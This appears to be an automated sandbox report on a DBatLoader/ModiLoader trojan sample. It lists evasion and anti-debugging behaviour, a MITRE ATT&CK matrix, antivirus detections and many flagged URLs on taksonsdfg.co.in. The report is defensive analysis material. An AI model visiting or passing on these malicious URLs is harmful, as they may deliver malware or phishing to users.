Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: 6BE4RDldhw.exe

Static file information: File size 1483264 > 1048576

Source:	Binary string: easinvoker.pdb source: 6BE4RDldhw.exe, 6BE4RDldhw.exe, 00000000.00000003.1333153403.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2582071460.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: 6BE4RDldhw.exe, 00000000.00000003.1333153403.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333431137.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2582071460.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2583380707.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected DBatLoader

Source: Yara match

File source: 0.2.6BE4RDldhw.exe.2e70000.2.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E88954 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02E88954

Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E9D2FC push 02E9D367h; ret	0_2_02E9D35F
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E763AE push 02E7640Bh; ret	0_2_02E76403
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E763B0 push 02E7640Bh; ret	0_2_02E76403
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E9C374 push 02E9C56Ah; ret	0_2_02E9C562
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E7332C push eax; ret	0_2_02E73368
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E9D0AC push 02E9D125h; ret	0_2_02E9D11D
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E83073 push 02E830C1h; ret	0_2_02E830B9
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E83074 push 02E830C1h; ret	0_2_02E830B9
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E9D1F8 push 02E9D288h; ret	0_2_02E9D280
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E9D144 push 02E9D1ECh; ret	0_2_02E9D1E4
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E8F104 push ecx; mov dword ptr [esp], edx	0_2_02E8F109
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E7678C push 02E767CEh; ret	0_2_02E767C6
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E7678A push 02E767CEh; ret	0_2_02E767C6
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E7D5A8 push 02E7D5D4h; ret	0_2_02E7D5CC
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E9C56C push 02E9C56Ah; ret	0_2_02E9C562
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E7C574 push ecx; mov dword ptr [esp], edx	0_2_02E7C579
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E8AADC push 02E8AB14h; ret	0_2_02E8AB0C
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E88AD2 push 02E88B0Ch; ret	0_2_02E88B04
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E88AD4 push 02E88B0Ch; ret	0_2_02E88B04
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E7CBEF push 02E7CD7Ah; ret	0_2_02E7CD72
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E7CBF4 push 02E7CD7Ah; ret	0_2_02E7CD72
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E88874 push 02E888B6h; ret	0_2_02E888AE
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02EE4850 push eax; ret	0_2_02EE4920
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E8694E push 02E869FBh; ret	0_2_02E869F3
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E86950 push 02E869FBh; ret	0_2_02E869F3
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E87914 push 02E87991h; ret	0_2_02E87989
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E85E84 push ecx; mov dword ptr [esp], edx	0_2_02E85E86
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E82F68 push 02E82FDEh; ret	0_2_02E82FD6

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon306.png

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E7676A IsIconic,

0_2_02E7676A

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E8AB18 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_02E8AB18

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Memory allocated: 2E70000 memory commit 480006144	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Memory allocated: 2E71000 memory commit 480178176	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Memory allocated: 2E9D000 memory commit 480002048	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Memory allocated: 2E9E000 memory commit 480350208	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Memory allocated: 2EF4000 memory commit 481017856	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Memory allocated: 2FEE000 memory commit 480014336	Jump to behavior

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E75908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02E75908

Source: 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%
Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000084E000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

API call chain: ExitProcess graph end node

graph_0-33443

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E8F740 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_02E8F740

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E88954 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02E88954

Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02E75ACC
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: GetLocaleInfoA,	0_2_02E7A7CC
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02E75BD8
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: GetLocaleInfoA,	0_2_02E7A818

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E79214 GetLocalTime,

0_2_02E79214

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E7B794 GetVersionExA,

0_2_02E7B794

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Native API	1 Valid Accounts	1 Valid Accounts	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	1 Valid Accounts	LSASS Memory	211 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Connections Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
6BE4RDldhw.exe	66%	ReversingLabs	Win32.Trojan.ModiLoader
6BE4RDldhw.exe	68%	Virustotal		Browse
6BE4RDldhw.exe	100%	Avira	TR/AD.Nekark.yroxx
6BE4RDldhw.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
taksonsdfg.co.in	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi:	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi8	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaIb	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/05	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiDASYC	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/2345678765432123456789876543/243_YjnxmyasmzaX	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiqr	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/9r6k	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RangesLas	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/H	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/234567876543212P	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/2345678765432121$	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/2345678765432123456789876543/243_Yjnxmyasmza0u	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzaaq	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/yr	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza0u	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/1r	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzakb	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/2345678765432123456789876543/243_Yjnxmyasmza	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmzaqb	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/)r	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgim	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzak	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgig3ok	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza	100%	Avira URL Cloud	malware
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi$	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-s	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/Qu	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/Qr	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi1Content-LengthAllowWarningViaUpgradeTransfer-	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/Ir	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-R	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/Ar	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi)r	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaCb	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza8	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza7	100%	Avira URL Cloud	phishing
